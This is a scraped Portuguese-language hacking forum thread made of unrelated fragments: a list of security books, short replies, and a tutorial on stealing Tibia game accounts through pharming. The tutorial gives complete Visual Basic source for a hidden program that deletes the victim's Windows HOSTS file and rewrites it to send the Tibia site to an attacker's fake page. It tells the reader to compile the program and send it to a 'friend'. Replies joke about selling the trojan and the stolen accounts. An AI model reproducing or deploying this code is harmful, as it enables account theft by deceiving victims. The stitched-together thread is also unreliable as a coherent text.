Messages

Sem essa de livros de kevin mitnick ou outros lixos parecidos, ao longo do tempo vou postando, aqui exemplos de books:

19 Deadly Sins of Software Security
Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research
Penetration Tester's Open Source Toolkit
Sockets, Shellcode, Porting, and Coding
e outros...

Aqui

poxa cara que legal

vc catou 600 vuln e 60 bot ?

show eim ?

parabens!

Muito bom, sem comentários.  :o

Excelente cara, e ninguém pra comentar... mto bom mesmo.

Link off.. 

Off novamente, desculpem dar uma de coveiro, mas não podemos perder um tutorial tão bom assim, gostaria de pedir ao Dark_Side ou algum outro usuário que já tenha pego o artigo, que upasse novamente. Obrigado.

Backtrack pra servidor eh?
auehuehueehe

Manda um freebsd ou então debian.

[Utilizando a técnina pharming em Tibia - Pegando contas.]

Utilizando a técnina pharming em Tibia - Pegando contas.
by Colt7r

Introdução:
Essa técnica pode ser usada em qualquer site, etc. A técnica de pharming, conhecida como DNS Cache Poisoning, consiste em alterar o arquivo HOSTS, fazendo com que o usuário seja levado a uma página falsa.

O que é necessário:
Não sei se você pode usar essa técnica em hospedagens grátis, mas creio que não. Será necessário um dedicado (ou qualquer porra que tenha um ip próprio... ah sim... você pode usar em sua casa também)

Como fazer?
Bom, primeiro irei explicar a técnica. O arquivo HOSTS (Windows\system32\drivers\etc\hosts) é constituido da seguinte maneira (em cada lihna)

Code Select Expand

IP_1 IP_2

Onde IP_2 é o site que usuário irá entrar, e que irá redirecionar para IP_1.
Exemplo:

Code Select Expand

64.233.169.147 209.85.141.85
Você entra no site do Orkut (209.85.141.85) e é redirecionado para o site do Google (64.233.169.147)

Na prática:
Escrevi um programa em Visual Basic que faz a tarefa. Irei postar o código-fonte e espero que não seja ripado, porque se for eu mando todo mundo tomar no c*u, bando de filho da put4.

Primeiro, Altere a propriedade VISIBLE do form1 para FALSE.
Segundo, altere a propriedade ShowInTaskBar do form1 para FALSE.
Agora, vá em View e depois code e copie e cole o código na janela Code Viewer, fazendo as alterações necessárias.

Code Select Expand

Private Sub Form_Load()
Dim file As Integer
file = FreeFile
On Error Resume Next

'CONFIGURAÇÃO
'/========================================================================\
ip_tibia = "62.146.69.27" 'IP da página do Tibia. Não mexa aqui.          |
'\========================================================================/
'/========================================================================\
ip_servidor_fake = "" 'Coloque aqui o IP do servidor da sua página fake.  |
'\========================================================================/

pharming = "" & ip_servidor_fake & " " & ip_tibia 'Não mexa aqui.

'CRÉDITOS
'/==================================\
'|NAME:                             |
'|PharmingTool for Tibia 1.0        |
'|==================================|
'|PROGRAMMER                        |
'|Colt7r                            |
'|FireHash Security Team            |
'|==================================|
'|CONTACT                           |
'|brasil.red-mexico.com #FireHash   |
'\==================================/

'Apagando arquivo HOSTS.
Kill "C:\Windows\system32\drivers\etc\hosts"

'Escrevendo no arquivo HOSTS. (C:\)
Open "C:\Windows\system32\drivers\etc\hosts" For Output As file
Print #file, pharming
Close file

Open "D:\Windows\system32\drivers\etc\hosts" For Output As file
Print #file, pharming
Close file
End
End Sub

Agora, compile e mande pro seu amiguinho

by Colt7r

bom, to achando que é o próprio ardamax, devido a tamanha semelhança, mas de qualquer forma está bom.

bom, estude php injection!

Bastante interessante esse software. Devia se chamar 'Anti-Distraidos'.
[]'s

//Colt

Já é!
Vou fazer meu pedido agora mesmo.

Vou rippar seu trojan e vende-lo na rua. Parabens, muito bom. Digno de um Van google.

Socket sempre foi um problema para os iniciantes. Excelente post.

Bom, IIS é sempre uma merda. Nao que seja facil de explorar/obter acessos em IIS, mas o problema sao os erros criticos. Valia tambem ter pego as continhas dos nerds viciados e vender no mercado.
[]'s

//Colt